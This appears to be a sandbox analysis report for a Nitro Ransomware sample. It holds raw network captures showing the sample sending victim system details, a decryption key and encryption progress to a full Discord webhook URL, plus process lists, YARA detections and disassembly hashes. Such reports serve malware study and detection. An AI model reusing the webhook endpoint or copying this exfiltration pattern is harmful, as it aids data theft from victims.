                                              2022-09-25 04:46:27 UTC0OUTGET / HTTP/1.1
                                              Host: api.ipify.org
                                              Connection: Keep-Alive
                                              2022-09-25 04:46:27 UTC0INHTTP/1.1 200 OK
                                              Server: Cowboy
                                              Connection: close
                                              Content-Type: text/plain
                                              Vary: Origin
                                              Date: Sun, 25 Sep 2022 04:46:27 GMT
                                              Content-Length: 11
                                              Via: 1.1 vegur
                                              2022-09-25 04:46:27 UTC0INData Raw: 38 34 2e 31 37 2e 35 32 2e 34 33
                                              Data Ascii: 84.17.52.43


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              1192.168.2.449700162.159.138.232443C:\Users\user\Desktop\12057ad2.exe
                                              TimestampkBytes transferredDirectionData
                                              2022-09-25 04:46:27 UTC0OUTPOST /api/webhooks/1004011365263998976/a2AGTiGqW4Slobe2Bq9uW3XtAqYfaz6vmF6N5qjD0tSb8Mxr_xKkfGVtlH8n2bvzuN04 HTTP/1.1
                                              Content-Type: application/x-www-form-urlencoded
                                              Host: canary.discord.com
                                              Content-Length: 291
                                              Expect: 100-continue
                                              Connection: Keep-Alive
                                              2022-09-25 04:46:27 UTC0INHTTP/1.1 100 Continue
                                              2022-09-25 04:46:27 UTC0OUTData Raw: 63 6f 6e 74 65 6e 74 3d 25 32 41 25 32 41 50 72 6f 67 72 61 6d 2b 65 78 65 63 75 74 65 64 25 32 41 25 32 41 2b 25 36 30 25 36 30 25 36 30 53 74 61 74 75 73 25 33 41 2b 41 63 74 69 76 65 2b 25 30 41 50 43 2b 4e 61 6d 65 25 33 41 2b 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 25 30 41 55 73 65 72 25 33 41 6a 6f 6e 65 73 25 30 41 55 55 49 44 25 33 41 2b 46 42 39 43 33 35 34 32 2d 46 41 37 33 2d 31 42 34 45 2d 46 42 41 34 2d 36 30 45 37 37 42 45 35 34 41 45 44 2b 2b 25 30 44 25 30 41 49 50 2b 41 64 64 72 65 73 73 25 33 41 2b 38 34 2e 31 37 2e 35 32 2e 34 33 25 36 30 25 36 30 25 36 30 26 75 73 65 72 6e 61 6d 65 3d 4e 69 74 72 6f 2b 52 61 6e 73 6f 6d 77 61 72 65 26 61 76 61 74 61 72 5f 75 72 6c 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 69 2e 69 62 62 2e 63
                                              Data Ascii: content=%2A%2AProgram+executed%2A%2A+%60%60%60Status%3A+Active+%0APC+Name%3A+computer%0AUser%3Auser%0AUUID%3A+FB9C3542-FA73-1B4E-FBA4-60E77BE54AED++%0D%0AIP+Address%3A+84.17.52.43%60%60%60&username=Nitro+Ransomware&avatar_url=https%3A%2F%2Fi.ibb.c
                                              2022-09-25 04:46:28 UTC0INHTTP/1.1 204 No Content
                                              Date: Sun, 25 Sep 2022 04:46:28 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              CF-Ray: 75011dbfe81f995a-FRA
                                              Set-Cookie: __dcfduid=045d3a2e3c8d11ed9f15ce5ff8257846; Expires=Fri, 24-Sep-2027 04:46:27 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Via: 1.1 google
                                              CF-Cache-Status: DYNAMIC
                                              Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                              X-Content-Type-Options: nosniff
                                              x-envoy-upstream-service-time: 50
                                              x-ratelimit-bucket: 3cd1f278bd0ecaf11e0d2391374c011d
                                              x-ratelimit-limit: 5
                                              x-ratelimit-remaining: 4
                                              x-ratelimit-reset: 1664081190
                                              x-ratelimit-reset-after: 2
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9uAyDW0ES0%2FQy8SN%2FPsw1Uc4wdp%2Fr44ju0xQ4kbhiTiaEb6mEg0AlT09n3TVJKDVvnb2%2BZ%2FrXH4hzN1MeS7%2BJZe37dbz3YC5RagNQNoMP47uPSMe2ztt6YzZsXWEnVmeIu4KtQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Set-Cookie: __sdcfduid=045d3a2e3c8d11ed9f15ce5ff8257846f487f2c613d5fd5acbb69b7e6cf4ab0b3ce89c6e624d81a18b6ad811ff08caf5; Expires=Fri, 24-Sep-2027 04:46:27 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
                                              Set-Cookie: __cfruid=7f74dd4d738e789baab8672651fdb745dc3a22e3-1664081188; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                              S
                                              2022-09-25 04:46:28 UTC2INData Raw: 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                              Data Ascii: erver: cloudflare


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              2192.168.2.449701162.159.138.232443C:\Users\user\Desktop\12057ad2.exe
                                              TimestampkBytes transferredDirectionData
                                              2022-09-25 04:46:28 UTC2OUTPOST /api/webhooks/1004011365263998976/a2AGTiGqW4Slobe2Bq9uW3XtAqYfaz6vmF6N5qjD0tSb8Mxr_xKkfGVtlH8n2bvzuN04 HTTP/1.1
                                              Content-Type: application/x-www-form-urlencoded
                                              Host: canary.discord.com
                                              Content-Length: 145
                                              Expect: 100-continue
                                              2022-09-25 04:46:28 UTC2INHTTP/1.1 100 Continue
                                              2022-09-25 04:46:28 UTC2OUTData Raw: 63 6f 6e 74 65 6e 74 3d 25 36 30 25 36 30 25 36 30 44 65 63 72 79 70 74 69 6f 6e 2b 4b 65 79 25 33 41 2b 54 72 69 78 69 64 25 36 30 25 36 30 25 36 30 26 75 73 65 72 6e 61 6d 65 3d 4e 69 74 72 6f 2b 52 61 6e 73 6f 6d 77 61 72 65 26 61 76 61 74 61 72 5f 75 72 6c 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 69 2e 69 62 62 2e 63 6f 25 32 46 30 66 72 54 44 39 32 25 32 46 64 69 73 63 6f 72 64 2d 61 76 61 74 61 72 2d 35 31 32 2e 70 6e 67
                                              Data Ascii: content=%60%60%60Decryption+Key%3A+Trixid%60%60%60&username=Nitro+Ransomware&avatar_url=https%3A%2F%2Fi.ibb.co%2F0frTD92%2Fdiscord-avatar-512.png
                                              2022-09-25 04:46:28 UTC2INHTTP/1.1 204 No Content
                                              Date: Sun, 25 Sep 2022 04:46:28 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              CF-Ray: 75011dc1ffe36904-FRA
                                              Set-Cookie: __dcfduid=048f0d923c8d11ed8311ce5ff8257846; Expires=Fri, 24-Sep-2027 04:46:28 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Via: 1.1 google
                                              CF-Cache-Status: DYNAMIC
                                              Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                              X-Content-Type-Options: nosniff
                                              x-envoy-upstream-service-time: 53
                                              x-ratelimit-bucket: 3cd1f278bd0ecaf11e0d2391374c011d
                                              x-ratelimit-limit: 5
                                              x-ratelimit-remaining: 3
                                              x-ratelimit-reset: 1664081190
                                              x-ratelimit-reset-after: 2
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7BBhvwHRSCmSo0lQIyByTIwcDVhwSdvnNeaOym4Z5tSguP4oC%2FhFjoDL40kZpoxd4ht85FO57f304fyqpCgaAdC1HwhAyReOF%2FrmSX%2BWMEMmVTX2szsKtAXJK1Igo4hs6YPDig%3D%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Set-Cookie: __sdcfduid=048f0d923c8d11ed8311ce5ff825784669ae7c47eb74de324d328d5c78cc51f0299526eeb621b19e40d3d255fea157b5; Expires=Fri, 24-Sep-2027 04:46:28 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
                                              Set-Cookie: __cfruid=7f74dd4d738e789baab8672651fdb745dc3a22e3-1664081188; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                              Server:
                                              2022-09-25 04:46:28 UTC3INData Raw: 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                              Data Ascii: cloudflare


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              3192.168.2.449702162.159.137.232443C:\Users\user\Desktop\12057ad2.exe
                                              TimestampkBytes transferredDirectionData
                                              2022-09-25 04:46:28 UTC3OUTPOST /api/webhooks/1004011365263998976/a2AGTiGqW4Slobe2Bq9uW3XtAqYfaz6vmF6N5qjD0tSb8Mxr_xKkfGVtlH8n2bvzuN04 HTTP/1.1
                                              Content-Type: application/x-www-form-urlencoded
                                              Host: canary.discord.com
                                              Content-Length: 133
                                              Expect: 100-continue
                                              2022-09-25 04:46:28 UTC4INHTTP/1.1 100 Continue
                                              2022-09-25 04:46:28 UTC4OUTData Raw: 63 6f 6e 74 65 6e 74 3d 25 36 30 25 36 30 25 36 30 54 6f 6b 65 6e 73 25 33 41 25 30 41 25 36 30 25 36 30 25 36 30 26 75 73 65 72 6e 61 6d 65 3d 4e 69 74 72 6f 2b 52 61 6e 73 6f 6d 77 61 72 65 26 61 76 61 74 61 72 5f 75 72 6c 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 69 2e 69 62 62 2e 63 6f 25 32 46 30 66 72 54 44 39 32 25 32 46 64 69 73 63 6f 72 64 2d 61 76 61 74 61 72 2d 35 31 32 2e 70 6e 67
                                              Data Ascii: content=%60%60%60Tokens%3A%0A%60%60%60&username=Nitro+Ransomware&avatar_url=https%3A%2F%2Fi.ibb.co%2F0frTD92%2Fdiscord-avatar-512.png
                                              2022-09-25 04:46:28 UTC4INHTTP/1.1 204 No Content
                                              Date: Sun, 25 Sep 2022 04:46:28 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              CF-Ray: 75011dc42dc5901c-FRA
                                              Set-Cookie: __dcfduid=04c598303c8d11eda4074e000d8729a3; Expires=Fri, 24-Sep-2027 04:46:28 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Via: 1.1 google
                                              CF-Cache-Status: DYNAMIC
                                              Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                              X-Content-Type-Options: nosniff
                                              x-envoy-upstream-service-time: 73
                                              x-ratelimit-bucket: 3cd1f278bd0ecaf11e0d2391374c011d
                                              x-ratelimit-limit: 5
                                              x-ratelimit-remaining: 2
                                              x-ratelimit-reset: 1664081190
                                              x-ratelimit-reset-after: 2
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vf1o1ahSVLonVTitEzWswxmWCnNy%2BXxTShEkxKQSQrFozqsrO0H0vzKqvbQdqVynUiotmSp0NnkuKmhKiV6g2VjvqAEqDOePI0wvHVdmho%2FSOwcOg%2BtSgp%2FfQ3fc6CXq%2F2zQRA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Set-Cookie: __sdcfduid=04c598303c8d11eda4074e000d8729a35a7a459a84e876940b4074f04242eaa21313bb3a5015ea958e8cb62672d76c26; Expires=Fri, 24-Sep-2027 04:46:28 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
                                              Set-Cookie: __cfruid=7f74dd4d738e789baab8672651fdb745dc3a22e3-1664081188; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                              Ser
                                              2022-09-25 04:46:28 UTC5INData Raw: 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                              Data Ascii: ver: cloudflare


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              4192.168.2.449703162.159.136.232443C:\Users\user\Desktop\12057ad2.exe
                                              TimestampkBytes transferredDirectionData
                                              2022-09-25 04:46:28 UTC5OUTPOST /api/webhooks/1004011365263998976/a2AGTiGqW4Slobe2Bq9uW3XtAqYfaz6vmF6N5qjD0tSb8Mxr_xKkfGVtlH8n2bvzuN04 HTTP/1.1
                                              Content-Type: application/x-www-form-urlencoded
                                              Host: canary.discord.com
                                              Content-Length: 147
                                              Expect: 100-continue
                                              2022-09-25 04:46:28 UTC5INHTTP/1.1 100 Continue
                                              2022-09-25 04:46:28 UTC5OUTData Raw: 63 6f 6e 74 65 6e 74 3d 25 36 30 25 36 30 25 36 30 53 74 61 72 74 69 6e 67 2b 66 69 6c 65 2b 65 6e 63 72 79 70 74 69 6f 6e 2e 2e 25 36 30 25 36 30 25 36 30 26 75 73 65 72 6e 61 6d 65 3d 4e 69 74 72 6f 2b 52 61 6e 73 6f 6d 77 61 72 65 26 61 76 61 74 61 72 5f 75 72 6c 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 69 2e 69 62 62 2e 63 6f 25 32 46 30 66 72 54 44 39 32 25 32 46 64 69 73 63 6f 72 64 2d 61 76 61 74 61 72 2d 35 31 32 2e 70 6e 67
                                              Data Ascii: content=%60%60%60Starting+file+encryption..%60%60%60&username=Nitro+Ransomware&avatar_url=https%3A%2F%2Fi.ibb.co%2F0frTD92%2Fdiscord-avatar-512.png
                                              2022-09-25 04:46:29 UTC6INHTTP/1.1 204 No Content
                                              Date: Sun, 25 Sep 2022 04:46:29 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              CF-Ray: 75011dc6ae689975-FRA
                                              Set-Cookie: __dcfduid=05071abc3c8d11edb93d963c3e9b1edd; Expires=Fri, 24-Sep-2027 04:46:29 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Via: 1.1 google
                                              CF-Cache-Status: DYNAMIC
                                              Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                              X-Content-Type-Options: nosniff
                                              x-envoy-upstream-service-time: 90
                                              x-ratelimit-bucket: 3cd1f278bd0ecaf11e0d2391374c011d
                                              x-ratelimit-limit: 5
                                              x-ratelimit-remaining: 1
                                              x-ratelimit-reset: 1664081190
                                              x-ratelimit-reset-after: 1
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=W8S8rvF8E9YQ36qW8ju3MQ4HuRk2Wu84XLnAodtIjNRdbpXR5ghoEzggjAoD5AudP8RjYQ6z2sY%2BeJGA084vu2S7O43g8rGS5KVKXF%2FeI6yU7EKkQPX31ZjnGU9SYYfxUiIORg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Set-Cookie: __sdcfduid=05071abc3c8d11edb93d963c3e9b1edd039f2a970f1c6832447f29ef7e04f6c877fa29f5cd55b27db72de4ca68061581; Expires=Fri, 24-Sep-2027 04:46:29 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
                                              Set-Cookie: __cfruid=6eabc3857375536211a04d72640b476f2ceaea83-1664081189; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                              Server: c
                                              2022-09-25 04:46:29 UTC7INData Raw: 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                              Data Ascii: loudflare


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              5192.168.2.449704162.159.137.232443C:\Users\user\Desktop\12057ad2.exe
                                              TimestampkBytes transferredDirectionData
                                              2022-09-25 04:48:27 UTC7OUTPOST /api/webhooks/1004011365263998976/a2AGTiGqW4Slobe2Bq9uW3XtAqYfaz6vmF6N5qjD0tSb8Mxr_xKkfGVtlH8n2bvzuN04 HTTP/1.1
                                              Content-Type: application/x-www-form-urlencoded
                                              Host: canary.discord.com
                                              Content-Length: 196
                                              Expect: 100-continue
                                              Connection: Keep-Alive
                                              2022-09-25 04:48:27 UTC7INHTTP/1.1 100 Continue
                                              2022-09-25 04:48:27 UTC7OUTData Raw: 63 6f 6e 74 65 6e 74 3d 25 36 30 25 36 30 25 36 30 46 69 6e 69 73 68 65 64 2b 65 6e 63 72 79 70 74 69 6e 67 2b 76 69 63 74 69 6d 25 32 37 73 2b 66 69 6c 65 73 2e 2b 54 6f 74 61 6c 2b 6e 75 6d 62 65 72 2b 6f 66 2b 66 69 6c 65 73 2b 65 6e 63 72 79 70 74 65 64 25 33 41 2b 35 34 25 36 30 25 36 30 25 36 30 26 75 73 65 72 6e 61 6d 65 3d 4e 69 74 72 6f 2b 52 61 6e 73 6f 6d 77 61 72 65 26 61 76 61 74 61 72 5f 75 72 6c 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 69 2e 69 62 62 2e 63 6f 25 32 46 30 66 72 54 44 39 32 25 32 46 64 69 73 63 6f 72 64 2d 61 76 61 74 61 72 2d 35 31 32 2e 70 6e 67
                                              Data Ascii: content=%60%60%60Finished+encrypting+victim%27s+files.+Total+number+of+files+encrypted%3A+54%60%60%60&username=Nitro+Ransomware&avatar_url=https%3A%2F%2Fi.ibb.co%2F0frTD92%2Fdiscord-avatar-512.png
                                              2022-09-25 04:48:27 UTC7INHTTP/1.1 204 No Content
                                              Date: Sun, 25 Sep 2022 04:48:27 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              CF-Ray: 750120ab0b7f929f-FRA
                                              Set-Cookie: __dcfduid=4b9ec3da3c8d11edbc2cd2bda68c03bf; Expires=Fri, 24-Sep-2027 04:48:27 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Via: 1.1 google
                                              CF-Cache-Status: DYNAMIC
                                              Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                              X-Content-Type-Options: nosniff
                                              x-envoy-upstream-service-time: 68
                                              x-ratelimit-bucket: 3cd1f278bd0ecaf11e0d2391374c011d
                                              x-ratelimit-limit: 5
                                              x-ratelimit-remaining: 4
                                              x-ratelimit-reset: 1664081310
                                              x-ratelimit-reset-after: 2
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=1PvONvHL7omCk0xFatFrQE96nWszSPRC3bS4IiThTOyA9DQcRlFKD9MbHxBpBw7j521j1ZSaBKrhbkkYMl7RbF4sT99%2F2UYK9snxidQk3OdzI4W8IICr2vewxih6nJTuXYDfWw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Set-Cookie: __sdcfduid=4b9ec3da3c8d11edbc2cd2bda68c03bff3fa7545e40d0932c78576e772e638ae0d1b61a505180d45f918869f811ca81e; Expires=Fri, 24-Sep-2027 04:48:27 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
                                              Set-Cookie: __cfruid=a6b6167d6c960df5d29602b835627bce362967f9-1664081307; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                              Server: clo
                                              2022-09-25 04:48:27 UTC9INData Raw: 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                              Data Ascii: udflare


                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Target ID:0
                                              Start time:06:46:22
                                              Start date:25/09/2022
                                              Path:C:\Users\user\Desktop\12057ad2.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\12057ad2.exe"
                                              Imagebase:0xc60000
                                              File size:62976 bytes
                                              MD5 hash:716BF12F1B7B6B04F1ACF6F8AE1EB4BB
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: JoeSecurity_NitroRansomware, Description: Yara detected Nitro Ransomware, Source: 00000000.00000003.304957981.000000000149C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_NitroRansomware, Description: Yara detected Nitro Ransomware, Source: 00000000.00000000.303846489.0000000000C62000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                              Reputation:low

                                              General

                                              Target ID:1
                                              Start time:06:46:23
                                              Start date:25/09/2022
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:cmd.exe
                                              Imagebase:0xd90000
                                              File size:232960 bytes
                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Target ID:2
                                              Start time:06:46:24
                                              Start date:25/09/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7c72c0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Target ID:3
                                              Start time:06:46:25
                                              Start date:25/09/2022
                                              Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                              Wow64 process (32bit):true
                                              Commandline:wmic csproduct get uuid
                                              Imagebase:0xcd0000
                                              File size:391680 bytes
                                              MD5 hash:79A01FCD1C8166C5642F37D1E0FB7BA8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Target ID:4
                                              Start time:06:46:38
                                              Start date:25/09/2022
                                              Path:C:\Users\user\AppData\Local\Temp\12057ad2.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Local\Temp\12057ad2.exe"
                                              Imagebase:0x40000
                                              File size:62976 bytes
                                              MD5 hash:716BF12F1B7B6B04F1ACF6F8AE1EB4BB
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: JoeSecurity_NitroRansomware, Description: Yara detected Nitro Ransomware, Source: 00000004.00000002.572902920.000000000079F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_NitroRansomware, Description: Yara detected Nitro Ransomware, Source: 00000004.00000002.574244055.00000000023C4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: MALWARE_Win_Nitro, Description: Detects Nitro Ransomware, Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe, Author: ditekSHen
                                              • Rule: RAN_Nitro_Aug_2021_1, Description: Detect Nitro ransomware, Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe, Author: Arkbird_SOLG
                                              Antivirus matches:
                                              • Detection: 100%, Avira
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 92%, ReversingLabs
                                              • Detection: 54%, Metadefender, Browse
                                              Reputation:low

                                              General

                                              Target ID:5
                                              Start time:06:46:49
                                              Start date:25/09/2022
                                              Path:C:\Users\user\AppData\Local\Temp\12057ad2.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Local\Temp\12057ad2.exe"
                                              Imagebase:0x5b0000
                                              File size:62976 bytes
                                              MD5 hash:716BF12F1B7B6B04F1ACF6F8AE1EB4BB
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: JoeSecurity_NitroRansomware, Description: Yara detected Nitro Ransomware, Source: 00000005.00000002.574148014.00000000028C4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_NitroRansomware, Description: Yara detected Nitro Ransomware, Source: 00000005.00000002.572197724.0000000000AE4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low

                                              Disassembly

                                              Reset < >

                                                Executed Functions

                                                Function 012A6220 Relevance: .3, Instructions: 306COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.572319473.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12a0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bb2acb400a61f5cc842c714188286191f439e4ad423e65d44f1c199d2b50650f
                                                • Instruction ID: 17abcec4017407713a3650b5be7c64798c76927d23a43c1fc36e040e9b97e092
                                                • Opcode Fuzzy Hash: bb2acb400a61f5cc842c714188286191f439e4ad423e65d44f1c199d2b50650f
                                                • Instruction Fuzzy Hash: 4DD1B274E00218CFDB54DFA9C994A9DBBB2FF89300F2081A9E409AB365DB31AD45CF50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012A6210 Relevance: .3, Instructions: 291COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.572319473.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12a0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 95bd3cdffba10387b46b676610861f3f177192db321b03a82ef91f72346e04c5
                                                • Instruction ID: 5c67b59c6a65bc23aa75e03350002d16d2ec8524b8d3d12d3b61670bb7dde319
                                                • Opcode Fuzzy Hash: 95bd3cdffba10387b46b676610861f3f177192db321b03a82ef91f72346e04c5
                                                • Instruction Fuzzy Hash: ACD1B274E10218CFDB54DFA9C994A9DBBB2FF89304F1081A9E409AB365DB30AD45CF41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012A4CC7 Relevance: .2, Instructions: 215COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.572319473.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12a0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1acf7a196621bf91ef5b353218b31f982be3547666b6d0824b397f94662e95f3
                                                • Instruction ID: 1ec7394074985eae705eca307c60a55fe7769d41efb5ea34499a04cf041b352d
                                                • Opcode Fuzzy Hash: 1acf7a196621bf91ef5b353218b31f982be3547666b6d0824b397f94662e95f3
                                                • Instruction Fuzzy Hash: AD913670E14218CFDB28DFB5D984B9EBBB2BF89304F2481A9D409AB355DB309985CF51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012A5DEA Relevance: 3.9, Strings: 3, Instructions: 168COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.572319473.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12a0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: xHl$xHl$xHl
                                                • API String ID: 0-3592839651
                                                • Opcode ID: 9fd1374ea924fbe4f98c96ee7c02e6088e04a16a6ad5506f9900df3570763566
                                                • Instruction ID: 9f8ff281f0697c8c4442d8eed1c707536600d91a93b39df860200052897aa6a2
                                                • Opcode Fuzzy Hash: 9fd1374ea924fbe4f98c96ee7c02e6088e04a16a6ad5506f9900df3570763566
                                                • Instruction Fuzzy Hash: 21710274E02209DFCB08EFA8D5909DEBBB2BF89304F108969D415AB754EB34AD49CF51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012A5DF8 Relevance: 3.9, Strings: 3, Instructions: 162COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.572319473.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12a0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: xHl$xHl$xHl
                                                • API String ID: 0-3592839651
                                                • Opcode ID: debdefa5a7a8886bc17b61475063f4c14ec04bf987bcdfb82ad51e0a88dd7d4e
                                                • Instruction ID: fa489981c7f67e3fbf9153eb1a705a21fd6a42acac47cffd0c64a17520cab70b
                                                • Opcode Fuzzy Hash: debdefa5a7a8886bc17b61475063f4c14ec04bf987bcdfb82ad51e0a88dd7d4e
                                                • Instruction Fuzzy Hash: 2961E274E11209DFCB08EFA8D5909DEBBB2BF89304F108929D415AB754EB31A949CF51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012A48D8 Relevance: .2, Instructions: 210COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.572319473.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12a0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 782c1681a03b868bf0d4ea4d2ec9f0daba0f06c7aba0dcb1c6c257fa657fba08
                                                • Instruction ID: febf72b50b05d07a62760fa9de21e069ce9eacb09e5291d3a0303788e3756845
                                                • Opcode Fuzzy Hash: 782c1681a03b868bf0d4ea4d2ec9f0daba0f06c7aba0dcb1c6c257fa657fba08
